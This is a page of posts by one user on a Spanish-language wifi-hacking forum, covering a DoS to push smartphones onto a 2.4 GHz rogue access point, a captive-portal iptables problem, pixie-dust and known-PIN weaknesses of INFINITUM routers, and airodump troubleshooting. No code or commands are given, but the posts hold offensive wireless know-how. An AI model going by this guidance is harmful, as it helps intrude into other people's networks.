#21 Re: Scripts y programación » PBC-bucle » 06-02-2019 18:02:28

Muchas gracias. biere

La verdad es que es mas simple que el mecanismo de un botijo.

Si alguien reporta alguna falla que me diga y me comprometo a arreglarlo.

#22 Re: Hacking wireless ético: Los métodos alternativos » Hostbase 1.2 está aqui » 31-01-2019 19:57:17

Sanko15 escribió:

Actualmente todos los usuarios se conectan a traves de smartphone. Casi todos tienen banda dual en el smartphone y la gran mayoria solo se conectan a la de 5ghz por entender que es la más rápida.

En este caso lo que puedes hacer es el DoS manualmente y obligarle a conectarse a la 2,4 que hayas levantado.

#23 Re: Herramientas wifi » Script multiuso wifi para Kali y otras distros » 31-01-2019 19:35:13

Hola.

No se si tendra algo que ver esto que comentais de iptables, pero tuve un problema hace un tiempo y ahora que os leo quiza este relacionado.

Estaba tratando de implemtar un portal cautivo con nodogsplash en mi raspberry con kali-linux y nunca pude hacerlo funcionar como debiera. No redirigia a la pagina que debia redirigir y daba acceso a internert cuando debia hacerlo. La culpa se la eche a iptables en principio, ya que es lo que menos entiendo de todo el entramado. Tampoco hay mucha documentcion de NDS (nodofsplash) para dispositivos que no sean "explicitamente" ruteadores.

Aplique las mismas reglas que se aplican en un router donde funciona a la perfeccion, pero como digo, nunca llego a funcionar.

Tampoco me tiro ningun error al fijar las reglas y podia verlas con su correspondiente comando, que no recuerdo ahora. como digo, son las mismas que tenia el router donde funcionaba todo con la precision de un reloj suizo.

En las versiones modernas que implementan ya bpfilter el comando iptables sigue existiendo, o deberia haberme tirado algun error?

La verdad si me deje mucho tiempo tratando de comprender el porque funcionaba en el router y no en la raspi, y al final arroje la toalla al menos de momento. Si pudiera tener algo que ver esto que comentais, seria cuestion de volver a intentarlo y pedir ayuda si no consiguiera que funcionara.

Muchas gracias y perdon por desviar el hilo, pero al ser una pregunta tan concreta no he considerado abrir otro hilo.

#24 Re: Estudio de algoritmos y búsqueda de la nueva brecha » (Duda) Infinitum 2.4 » 29-01-2019 20:27:44

Hola.

Para este tipo de redes, INFINITUMXXXX_2.4 hay varios routers que se reparten. Algunos son vulnerables a pixie tanto por 2,4 como por 5 GHz. Otras son vulnerables a PIN conocido o por patron solo en la red de 5 GHz, aunque esto ultimo he visto ejemplos pero no lo he comprobado por mi mismo.

A lo que el compa se refiere es que hay muchos anuncios en facebook y youtube que por una modica cantidad de dinero, 200 o 300 pesos (10 o 15 euros), te dan la llave WPA. Para ello te piden captura de pantalla donde se vea ESSID, BSSID y ademas te piden la clave lada (prefijo telefonico).

mini_245.jpeg                   mini_24.jpg

Tuve una curiosa conversacion con una de estas personas que ofrecen este tipo de servicio, y a la unica conclusion que pude llegar es que o bien tienen una puerta trasera en Telmex (el ISP), o son trabajadores del propio Telmex los que te dan la llave. Digo esto porque te dan la llave independientemente de que el usuario la haya cambiado, e incluso si no pagas lo acordado por la llave (No cobran por adelantado, solo al darte la llave y tu comprobar que es correcta), pueden cambiar el nombre de la red y poner por ejemplo "tu vecino te quiere robar internet" de nombre. Esto es clara evidencia de que realmente la manera como lo hacen es entrando en el router de manera remota. Al menos esa es mi opinion.

#25 Re: Alfa Network » Alfa AWUS036NHA detecta clientes según donde ejecute LIVE USB » 26-01-2019 02:43:18

Esta bien curioso este caso.

La deteccion de clientes la haces con linset, o cualquier otro script, o directamente con airodump? Si no lo haces con airodump, prueba con airodump lanzandolo tu directamente. Sin ningun script que lo lance por ti.

Estas seguro que estas usando la alfa en ambos casos? Pudiera ser que en el portatil tuvieras un dispositivo wifi integrado y fuera con ese con el que no te detecte los clientes.

Estas en el mismo lugar con el portatil y con el pc?

No te reconoce ningun cliente de ninguna red, o solo de la tuya?

Notas mas diferencias a la hora de escanear con airodump? (menos redes, menos canales, o cualquier diferencia)

Pudiera ser que estes escaneando por un lado en 5GHz y en 2,4 por el otro?

Ayudaria salidas de algunos comandos, como de airmon-ng, y añadiria la salida de lsmod, para ver si esta tomando el mismo modulo en el PC y en el portatil.

Pie de página

Información del usuario

Ultimo usuario registrado: CreMaTLVctm
Usuarios registrados conectados: 0
Invitados conectados: 12

Estadisticas de los foros

Número total de usuarios registrados: 1,503
Número total de temas: 1,320
Número total de mensajes: 13,404

Máx. usuarios conectados: 74 el 13-11-2018 18:47:20
Impulsado por FluxBB